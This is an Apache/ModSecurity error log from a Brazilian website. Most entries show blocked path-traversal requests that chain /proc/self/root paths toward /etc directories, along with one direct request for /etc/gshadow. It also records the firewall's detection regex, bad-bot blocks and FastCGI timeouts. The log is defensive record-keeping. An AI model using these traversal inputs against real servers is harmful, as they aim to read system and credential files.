[Tue Mar 17 18:03:31.167527 2026] [:error] [pid 7004:tid 140411641214720] [client 74.7.241.31:45598] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBo8U6Sx0TG1YjmQjFEwAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:03:38.861695 2026] [:error] [pid 2473:tid 140411683178240] [client 216.73.216.191:24095] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBqqBJNF7axNlVR0UvJAAAAAc"]
[Tue Mar 17 18:03:48.089840 2026] [proxy_fcgi:error] [pid 2598:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35506] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:04:00.526821 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:34052] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBv9Y0UrI5A3LftIwUMgAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:04:11.125836 2026] [proxy_fcgi:error] [pid 6296:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35764] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:04:12.496444 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.241.31:39210] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBzAeiSKl8TjouI-YuSwAAA8c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:04:35.134796 2026] [proxy_fcgi:error] [pid 7004:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36164] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:04:36.563988 2026] [:error] [pid 2598:tid 140411741927168] [client 74.7.241.31:59706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnB5Bj0p0SRWAqcjGGQswAAAwA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:04:57.684883 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:39944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnB-da6ubjKNq_cu4YeUwAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:04:59.129896 2026] [proxy_fcgi:error] [pid 6296:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36456] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:05:00.911039 2026] [:error] [pid 25836:tid 140411540502272] [client 74.7.241.31:39948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnB_Ih-PF_25v4hFRCBcgAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:05:04.076578 2026] [:error] [pid 25836:tid 140411624429312] [client 74.7.241.31:39954] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCAIh-PF_25v4hFRCBdAAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:05:23.129795 2026] [proxy_fcgi:error] [pid 6296:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36666] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:05:25.016714 2026] [:error] [pid 7004:tid 140411699963648] [client 74.7.244.43:37894] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnCFcU6Sx0TG1YjmQjFPAAAAoU"]
[Tue Mar 17 18:05:25.155905 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.241.31:49500] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCFaBJNF7axNlVR0UvQwAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:05:25.316828 2026] [:error] [pid 6296:tid 140411607643904] [client 74.7.228.61:42202] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnCFXIk7brgkOH-rIWjPgAAAVA"]
[Tue Mar 17 18:05:45.125799 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:36914] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:05:46.535362 2026] [:error] [pid 6296:tid 140411716749056] [client 74.7.241.31:38480] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCKnIk7brgkOH-rIWjPwAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:05:55.467962 2026] [:error] [pid 2473:tid 140411624429312] [client 74.7.241.31:41628] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCM6BJNF7axNlVR0UvSQAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:06:08.122303 2026] [proxy_fcgi:error] [pid 7437:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:37200] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:06:10.191351 2026] [:error] [pid 29151:tid 140411582465792] [client 74.7.241.31:49786] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCQvPqhzTj3BvfDX-eTwAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:06:13.159448 2026] [:error] [pid 2598:tid 140411574073088] [client 74.7.241.31:49798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCRRj0p0SRWAqcjGGQywAAAxQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:06:15.449338 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.241.31:49804] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCRweiSKl8TjouI-YudQAAA8E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:06:18.084743 2026] [:error] [pid 6296:tid 140411599251200] [client 74.7.241.31:49812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCSnIk7brgkOH-rIWjUQAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:06:32.131369 2026] [proxy_fcgi:error] [pid 26799:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:37444] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:06:34.167140 2026] [:error] [pid 25836:tid 140411574073088] [client 74.7.241.31:44514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCWoh-PF_25v4hFRCBjgAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:06:35.550957 2026] [:error] [pid 7004:tid 140411574073088] [client 74.7.241.31:44528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCW8U6Sx0TG1YjmQjFUQAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:06:37.075530 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:44544] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCXeyqAr6etmhZHNo-VQAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:06:37.575631 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:40210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCXda6ubjKNq_cu4YefwAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:06:38.549643 2026] [:error] [pid 25836:tid 140411607643904] [client 74.7.241.31:34672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCXoh-PF_25v4hFRCBjwAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:06:58.153859 2026] [proxy_fcgi:error] [pid 6296:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:37842] AH01075: Error dispatching request to : (polling)
